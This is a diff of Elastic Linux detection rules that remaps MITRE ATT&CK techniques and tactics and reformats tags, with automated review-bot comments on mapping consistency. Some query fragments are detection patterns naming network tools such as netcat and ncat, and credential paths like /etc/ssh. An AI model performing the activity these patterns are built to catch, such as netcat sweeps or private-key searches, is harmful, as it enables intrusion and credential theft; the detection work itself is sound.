@@ -105,25 +105,15 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] -name = "Impair Defenses" id = "T1562" +name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -name = "Indicator Blocking" -id = "T1562.006" -reference = "https://attack.mitre.org/techniques/T1562/006/" - -[[rule.threat.technique]] -name = "Subvert Trust Controls" -id = "T1553" -reference = "https://attack.mitre.org/techniques/T1553/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" diff --git a/rules/linux/defense_evasion_unusual_preload_env_vars.toml b/rules/linux/defense_evasion_unusual_preload_env_vars.toml index fb5343a26bc..bc08faf6393 100644 --- a/rules/linux/defense_evasion_unusual_preload_env_vars.toml +++ b/rules/linux/defense_evasion_unusual_preload_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,15 +57,7 @@ After saving the integration change, the Elastic Agents running this policy will For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -128,25 +120,6 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[[rule.threat.technique.subtechnique]] -id = "T1574.006" -name = "Dynamic Linker Hijacking" -reference = "https://attack.mitre.org/techniques/T1574/006/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["process.env_vars"] diff --git a/rules/linux/defense_evasion_user_or_group_deletion.toml b/rules/linux/defense_evasion_user_or_group_deletion.toml index dcf6cbd1ec0..40244d95a62 100644 --- a/rules/linux/defense_evasion_user_or_group_deletion.toml +++ b/rules/linux/defense_evasion_user_or_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["system"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -69,13 +69,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
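Review bot: Removing the Persistence `[[rule.threat]]` entry leaves T1574.006 Dynamic Linker Hijacking mapped to Defense Evasion only, although ATT&CK also lists that sub-technique under Persistence and Privilege Escalation, so any coverage view built from `rule.threat` loses the Persistence cell for preload-environment-variable activity. If the intent is one primary tactic per rule that is a reasonable call, but it deserves a sentence in the commit message so the drop is not mistaken for an oversight. The same Persistence removal recurs in the var-log-file-creation and PAM-version-discovery hunks later in this patch.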
@@ -86,11 +80,11 @@ iam where host.os.type == "linux" and event.type in ("group", "user") and event. framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml index 533fff59b87..1fe2cb6e7fb 100644 --- a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml +++ b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/11" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,18 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -108,42 +97,10 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" -[[rule.threat.technique.subtechnique]] -id = "T1564.001" -name = "Hidden Files and Directories" -reference = "https://attack.mitre.org/techniques/T1564/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["file.path", "process.executable"] diff --git a/rules/linux/discovery_dynamic_linker_via_od.toml b/rules/linux/discovery_dynamic_linker_via_od.toml index 40420f501f9..41be32281ac 100644 --- a/rules/linux/discovery_dynamic_linker_via_od.toml +++ b/rules/linux/discovery_dynamic_linker_via_od.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,9 +113,9 @@ process where host.os.type == "linux" and event.type == "start" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1057" -name = "Process Discovery" -reference = "https://attack.mitre.org/techniques/T1057/" +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" 
diff --git a/rules/linux/discovery_esxi_software_via_find.toml b/rules/linux/discovery_esxi_software_via_find.toml index a2e43bc8e59..6d9fffd4a0c 100644 --- a/rules/linux/discovery_esxi_software_via_find.toml +++ b/rules/linux/discovery_esxi_software_via_find.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,6 +113,11 @@ not ?process.parent.executable == "/usr/lib/vmware/viewagent/bin/uninstall_viewa [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [[rule.threat.technique]] id = "T1518" name = "Software Discovery" diff --git a/rules/linux/discovery_esxi_software_via_grep.toml b/rules/linux/discovery_esxi_software_via_grep.toml index af3f9c6de0c..bdacb1c0cb6 100644 --- a/rules/linux/discovery_esxi_software_via_grep.toml +++ b/rules/linux/discovery_esxi_software_via_grep.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -114,9 +114,9 @@ not ?process.parent.executable in ("/usr/share/qemu/init/qemu-kvm-init", "/etc/s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml index 401470b341b..1168b4f3c91 100644 
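Review bot: `discovery_esxi_software_via_grep.toml` replaces T1518 Software Discovery with T1083, while the sibling `discovery_esxi_software_via_find.toml` hunk just above adds T1083 and keeps T1518, so two rules detecting the same ESXi software enumeration through different utilities now carry different technique sets. Unless the grep variant is deliberately narrower, keep T1518 in both by inserting a second `[[rule.threat.technique]]` block with `id = "T1518"` and `name = "Software Discovery"` after the new T1083 entry in the grep rule, or drop it from both.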
--- a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml +++ b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,19 +56,7 @@ This rule detects common Linux utilities and shells reading kprobes and tracing risk_score = 21 rule_id = "fb542346-1624-4cf2-bcc7-c68abaab261b" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -88,24 +76,11 @@ process.args like ("/sys/kernel/debug/kprobes/*", "/sys/kernel/debug/tracing/*", framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kernel_module_enumeration.toml b/rules/linux/discovery_kernel_module_enumeration.toml index e78a5b7070c..4bdbc4b9a63 100644 --- a/rules/linux/discovery_kernel_module_enumeration.toml +++ b/rules/linux/discovery_kernel_module_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,15 +122,14 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/discovery_kernel_seeking.toml b/rules/linux/discovery_kernel_seeking.toml index f7159bd2840..419aec12283 100644 --- a/rules/linux/discovery_kernel_seeking.toml +++ b/rules/linux/discovery_kernel_seeking.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,15 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -117,20 +109,12 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kernel_unpacking.toml b/rules/linux/discovery_kernel_unpacking.toml index 5fd3d44ce52..216000df4dc 100644 --- a/rules/linux/discovery_kernel_unpacking.toml +++ b/rules/linux/discovery_kernel_unpacking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -78,15 +78,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -115,20 +107,12 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kubeconfig_file_discovery.toml b/rules/linux/discovery_kubeconfig_file_discovery.toml index 499b8b47ad0..154c255d524 100644 --- a/rules/linux/discovery_kubeconfig_file_discovery.toml +++ b/rules/linux/discovery_kubeconfig_file_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -92,17 +92,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Data Source: Elastic Defend for Containers", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -142,9 +132,27 @@ process where host.os.type == "linux" and event.type == "start" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_kubectl_permission_discovery.toml b/rules/linux/discovery_kubectl_permission_discovery.toml index 51b3731597f..321afa12afc 100644 --- a/rules/linux/discovery_kubectl_permission_discovery.toml 
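Review bot: Replacing T1613 Container and Resource Discovery with T1083 in the `@@ -142,9 +132,27 @@` hunk removes the only container-specific technique from a rule whose tags still carry `Domain: Container` and `Domain: Kubernetes`, and the kubectl permission-discovery hunk that follows drops T1613 the same way. Since ATT&CK lists T1613 under Discovery it can sit next to T1083 in the same `[[rule.threat]]` entry without introducing a second Discovery tactic, so consider keeping it to avoid losing these two detections from container-focused coverage reporting. The new Credential Access entry with T1552.001 and the added `"Tactic: Credential Access"` tag are consistent with each other.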
+++ b/rules/linux/discovery_kubectl_permission_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_ maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,9 +119,9 @@ process.name == "kubectl" and process.args == "auth" and process.args == "can-i" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_linux_hping_activity.toml b/rules/linux/discovery_linux_hping_activity.toml index 13cafc9195f..c962146b215 100644 --- a/rules/linux/discovery_linux_hping_activity.toml +++ b/rules/linux/discovery_linux_hping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -128,14 +128,13 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_linux_nping_activity.toml b/rules/linux/discovery_linux_nping_activity.toml index 0e020284684..efbbef38924 100644 
--- a/rules/linux/discovery_linux_nping_activity.toml +++ b/rules/linux/discovery_linux_nping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -128,14 +128,18 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1018" +name = "Remote System Discovery" +reference = "https://attack.mitre.org/techniques/T1018/" + [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml index 221cc4ff072..4489c16b91c 100644 --- a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml +++ b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,9 +112,9 @@ process.command_line like ("/etc/exports", "/etc/fstab") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1135" +name = "Network Share Discovery" +reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_pam_version_discovery.toml b/rules/linux/discovery_pam_version_discovery.toml index fd9295a70a0..b850ea0830e 100644 
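Review bot: The nping rule now carries T1018 Remote System Discovery next to T1046, but the hping hunk immediately before it was left with T1046 only after dropping T1082, although hping is a comparable host-probing tool and the ping-sweep rule later in this patch also gains T1018. If that asymmetry is not intentional, add the same `[[rule.threat.technique]]` block with `id = "T1018"` and `name = "Remote System Discovery"` to `discovery_linux_hping_activity.toml`.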
--- a/rules/linux/discovery_pam_version_discovery.toml +++ b/rules/linux/discovery_pam_version_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,19 +86,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Persistence", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -123,37 +111,11 @@ not (
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
+id = "T1518"
+name = "Software Discovery"
+reference = "https://attack.mitre.org/techniques/T1518/"
[rule.threat.tactic]
id = "TA0007"
name = "Discovery"
reference = "https://attack.mitre.org/tactics/TA0007/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/linux/discovery_ping_sweep_detected.toml b/rules/linux/discovery_ping_sweep_detected.toml
index 1cffefe920a..081d7c941ab 100644
--- a/rules/linux/discovery_ping_sweep_detected.toml
+++ b/rules/linux/discovery_ping_sweep_detected.toml
@@ -2,7 +2,7 @@
creation_date = "2023/09/04"
integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -110,6 +110,11 @@ process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat
[[rule.threat]]
framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1018"
+name = "Remote System Discovery"
+reference = "https://attack.mitre.org/techniques/T1018/"
+
[[rule.threat.technique]]
id = "T1046"
name = "Network Service Discovery"
@@ -119,7 +124,6 @@ reference = "https://attack.mitre.org/techniques/T1046/"
id = "TA0007"
name = "Discovery"
reference = "https://attack.mitre.org/tactics/TA0007/"
-
[rule.threshold]
field = ["host.id", "process.parent.entity_id", "process.executable"]
value = 1
diff --git a/rules/linux/discovery_polkit_version_discovery.toml b/rules/linux/discovery_polkit_version_discovery.toml
index 2420b1dc14c..7bd3c7400e3 100644
--- a/rules/linux/discovery_polkit_version_discovery.toml
+++ b/rules/linux/discovery_polkit_version_discovery.toml
@@ -2,7 +2,7 @@
creation_date = "2025/01/16"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -111,9 +111,9 @@ not (
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
+id = "T1518"
+name = "Software Discovery"
+reference = "https://attack.mitre.org/techniques/T1518/"
[rule.threat.tactic]
id = "TA0007"
diff --git a/rules/linux/discovery_private_key_password_searching_activity.toml b/rules/linux/discovery_private_key_password_searching_activity.toml
index 413d337fc5a..c953db6b472 100644
--- a/rules/linux/discovery_private_key_password_searching_activity.toml
+++ b/rules/linux/discovery_private_key_password_searching_activity.toml
@@ -2,7 +2,7 @@
creation_date = "2024/11/04"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -110,25 +110,30 @@ process.command_line like ("*/home/*", "*/etc/ssh*", "*/root/*", "/")
[[rule.threat]]
framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
[[rule.threat.technique]]
id = "T1552"
name = "Unsecured Credentials"
reference = "https://attack.mitre.org/techniques/T1552/"
[[rule.threat.technique.subtechnique]]
-id = "T1552.001"
-name = "Credentials In Files"
-reference = "https://attack.mitre.org/techniques/T1552/001/"
+id = "T1552.004"
+name = "Private Keys"
+reference = "https://attack.mitre.org/techniques/T1552/004/"
[rule.threat.tactic]
id = "TA0006"
name = "Credential Access"
reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/linux/discovery_proc_maps_read.toml b/rules/linux/discovery_proc_maps_read.toml
index 986cceed84d..cc4db1da87b 100644
--- a/rules/linux/discovery_proc_maps_read.toml
+++ b/rules/linux/discovery_proc_maps_read.toml
@@ -2,7 +2,7 @@
creation_date = "2024/01/29"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -86,19 +86,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Discovery",
- "Tactic: Credential Access",
- "Data Source: Auditd Manager",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
